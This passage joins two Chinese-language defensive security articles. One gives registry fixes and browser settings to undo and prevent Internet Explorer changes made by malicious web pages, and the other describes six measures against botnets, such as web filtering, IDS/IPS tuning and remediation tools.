[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]

“NoViewSource”=dword:00000000

"NoBrowserContextMenu"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]

“NoViewSource”=dword:00000000

“NoBrowserContextMenu”=dword:00000000

要特别注意的是，在你编制的注册表文件unlock.reg中，“REGEDIT4”一定要大写，并且它的后面一定要空一行，还有，“REGEDIT4”中的“4”和“T”之间一定不能有空格，否则将前功尽弃！许多朋友写注册表文件之所以不成功，就是因为没有注意到上面所说的内容，这回该注意点喽。请注意如果你是Win2000或WinXP用户，请将“REGEDIT4”改为Windows Registry Editor Version 5.00。

二、预防办法

1、要避免中招，关键是不要轻易去一些自己并不了解的站点，特别是那些看上去美丽诱人的网址更不要贸然前往，否则吃亏的往往是你。

2、由于该类网页是含有有害代码的ActiveX网页文件，因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。

具体方法是：在IE窗口中点击“工具→Internet选项，在弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过，这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。唉，有利就有弊，你还是自己看着办吧。

3、对于Windows98用户，请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把其中的“ActiveXComponent.class”删掉；对于WindowsMe用户，请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把其中的“ActiveXComponent.class”删掉。请放心，删除这个组件不会影响到你正常浏览网页的。

4、对于所有用户，都建议安装Norton AntiVirus 2002 v8.0杀毒软件，此软件已经把通过IE修改注册表的代码定义为Trojan.Offensive ，增加了s cript Blocking功能，它将对此类恶作剧进行监控，并予以拦截。

另外，下载超级兔子魔法设置软件后安装，如果出现问题，可以用它来恢复。不过，“兔子”对于我们在上面所说的恶意网页使得IE中鼠标右键失效，“查看”菜单中的“源文件”被禁用这两种现象无法恢复。

5、既然这类网页是通过修改注册表来破坏我们的系统，那么我们可以事先把注册表加锁：禁止修改注册表，这样就可以达到预防的目的。不过，自己要使用注册表编辑器regedit.exe该怎么办呢？因此我们还要在此前事先准备一把“钥匙”，以便打开这把“锁”！

加锁方法如下：

(1)运行注册表编辑器regedit.exe；

(2)展开注册表到

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

下，新建一个名为DisableRegistryTools的DWORD值，并将其值改为“1”，即可禁止使用注册表编辑器regedit.exe。

解锁方法如下：

用记事本编辑一个任意名字的.reg文件，比如unlock.reg，内容如下：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Policies\System]

“DisableRegistryTools”=dword:00000000

存盘，你就有了一把解锁的钥匙了！如果要使用注册表编辑器，则双击unlock.reg即可。请注意如果你是Win2000或WinXP用户，请将“REGEDIT4”写为Windows Registry Editor Version 5.00。

6、对Win2000用户，还可以通过在Win2000下把服务里面的远程注册表*作服务“Remote Registry Service”禁用，来对付该类网页。具体方法是：点击“管理工具→服务→Remote Registry Service(允许远程注册表*作)”，将这一项禁用即可。

7、如果觉得手动修改注册表太危险，可以下载相应reg文件恢复被修改的注册表。

8、虽然经过一番辛苦的劳动修改回了标题和默认连接首页，但如果以后又不小心进入该站就又得麻烦一次。其实，你可以在IE中做一些设置以便永远不进该站点：

打开IE，点击“工具”→“Internet选项”→“内容”→“分级审查”，点“启用”按钮，会调出“分级审查”对话框，然后点击“许可站点”标签，输入不想去的网站网址，如输入http://on888.home.chinaren.com，按“从不”按钮，再点击“确定”即大功告成！

9、升级你的IE为6.0版本，可以有效防范上面这些症状。

10、下载微软最新的Microsoft Windows s cript 5.6可以预防上面所说的现象，更可预防目前流行的、可恶的混客绝情炸弹。

驱逐威胁 六把利剑向僵尸网络头上砍去

来源：赛迪网 作者：茫然的风

僵尸网络（Botnet）是指多台被恶意代码感染、控制的与互联网相连接的计算机。Botnet正成为一种日益严重的威胁，不过，只要我们用好对付它的六把利剑，僵尸网络就难以造成严重的祸患。

第一剑：采用Web过滤服务

Web过滤服务是迎战僵尸网络的最有力武器。这些服务扫描Web站点发出的不正常的行为，或者扫描已知的恶意活动，并且阻止这些站点与用户接触。

Websense、Cyveillance 、FaceTime都是很好的例子。它们都可以实时地监视互联网，并查找从事恶意的或可疑的活动的站点，如下载JavaScript或执行screen scrapes等正常Web浏览之外的其它骗局。Cyveillance 和Support Intelligence还提供另外一种服务：通知Web站点操作人员及ISP等恶意软件已经被发现，因此黑客攻击的服务器能被修复，他们如是说。

第二剑：转换浏览器

防止僵尸网络感染的另一种策略是浏览器的标准化，而不是仅仅依靠微软的Internet Explorer 或Mozilla 的Firefox。当然这两者确实是最流行的，不过正因为如此，恶意软件作者们通常也乐意为它们编写代码。同样的策略也适用于操作系统。据统计，Macs很少受到僵尸网络的侵扰，正如桌面Linux操作系统，因为大多数僵尸的罪魁祸首都把目标指向了流行的Windows。

第三剑：禁用脚本

另一个更加极端的措施是完全地禁用浏览器的脚本功能，虽然有时候这会不利于工作效率，特别是如果雇员们在其工作中使用了定制的、基于Web的应用程序时，更是这样。

第四剑：部署入侵检测和入侵防御系统

另一种方法是调整你的IDS（入侵检测系统）和IPS（入侵防御系统），使之查找有僵尸特征的活动。例如，重复性的与外部的IP地址连接或非法的DNS地址连接都是相当可疑的。虽然难于发现，不过，另一个可以揭示僵尸的征兆是在一个机器中SSL通信的突然上升，特别是在某些端口上更是这样。这就可能表明一个僵尸控制的通道已经被激活了。您需要找到那些将电子邮件路由到其它服务器而不是路由到您自己的电子邮件服务器的机器，它们也是可疑的。僵尸网络的专家Gadi Evron进一步建议，您应该学会监视在高层对Web进行访问的家伙。它们会激活位于一个Web页面上的所有的链接，而一个高层次的访问可能会指明一台机器正被一个恶意的Web站点所控制。

一个IPS或IDS系统可以监视不正常的行为，这些行为指明了难于发现的、基于HTTP的攻击和来自远程过程的攻击、Telnet和地址解析协议（即ARP）欺骗等等。然而，值得注意的是，许多IPS检测器使用基于特征的检测技术，也就是说，这些攻击被发现时的特征被添加到一个数据库中，如果数据库中没有有关的特征就无法检测出来。因此，IPS或IDS就必须经常性的更新其数据库以识别有关的攻击，对于犯罪活动的检测需要持续不断的努力。

第五剑：保护用户生成的内容

还应该保护你的WEB操作人员，使其避免成为“稀里糊涂”的恶意软件犯罪的帮凶。如果你并没有朝着WEB 2.0社会网络迈进，你公司的公共博客和论坛就应该限制为只能使用文本方式，这也是Web Crossing的副总裁Michael Krieg的观点，他是社会化网络软件和主机服务的创造者。

Krieg 说，“我并不清楚我们成千上万的用户有哪一个在消息文本中允许了JavaScript，我也不清楚谁在其中嵌入了代码和其它的HTML标签。我们不允许人们这样做。我们的应用程序在默认情况下要将这些东西剥离出去。”

Dan Hubbard是Websense安全研究的副总裁，他补充说，“那是用户创建内容站点的一个严重问题，即Web 2.0现象。你怎么才能在允许人们上传内容的强大功能与不允许他们上传不良的东西之间寻求平衡呢？”

这个问题的答案是很明确的。如果你的站点需要让会员或用户交换文件，就应该进行设置，使其只允许有限的和相对安全的文件类型，如那些以.jpeg或mp3为扩展名的文件。（不过，恶意软件的作者们已经开始针对MP3等播放器类型，编写了若干蠕虫。而且随着其技术水平的发现，有可能原来安全的文件类型也会成为恶意软件的帮凶。）

第六剑：使用补救工具

如果你发现了一台被感染的计算机，那么一个临时应急的重要措施就是如何进行补救。像Symantec等公司都宣称，他们可以检测并清除即使隐藏最深的rootkit感染。Symantec在这里指明了Veritas和VxMS(Veritas Mapping Service)技术的使用，特别是VxMS让反病毒扫描器绕过Windows 的文件系统的API。（API是被操作系统所控制的，因此易于受到rootkit的操纵）。其它的反病毒厂商也都试图保护系统免受rootkit的危害，如McAfee 和FSecure等。

不过，Evron认为，事后进行的检测所谓的恶意软件真是一个错误！因为它会使IT专家确信他们已经清除了僵尸，而其实呢，真正的僵尸代码还驻留在计算机上。他说，“反病毒并非是一个解决方案，因为它是一个自然的反应性的东西。反病毒能够识别有关的问题，因而反病毒本身也会被操纵、利用。”

这并不是说你不应该设法实施反病毒软件中最好的对付rootkit的工具，不过你要注意这样做就好似是在你丢失了贵重物品后再买个保险箱而已。用一句成语讲，这就叫做“亡羊补牢”。Evron相信，保持一台计算机绝对安全干净、免受僵尸感染的方法是对原有的系统彻底清楚，并从头开始安装系统。

不要让你的用户访问已知的恶意站点，并监视网络中的可疑行为，保护你的公共站点免受攻击，你的网络就基本上处于良好状态。这是安全专家们一致的观点。

可以注意到，如果一个网络工作人员对于网络安全百思不得其解，并会油然而生这样一种感觉,‘我应该怎么对付这些数以百万的僵尸呢?’。”其实，答案非常简单。正如，FaceTime 的恶意软件研究主管Chris Boyd所言，“只需断开你的网络，使其免受感染─病毒、木马、间谍软件或广告软件等……。将它当作一台PC上的一个流氓文件来进行清除(不过，谁又能保证真正清除干净呢？)。这就是你需要做的全部事情。”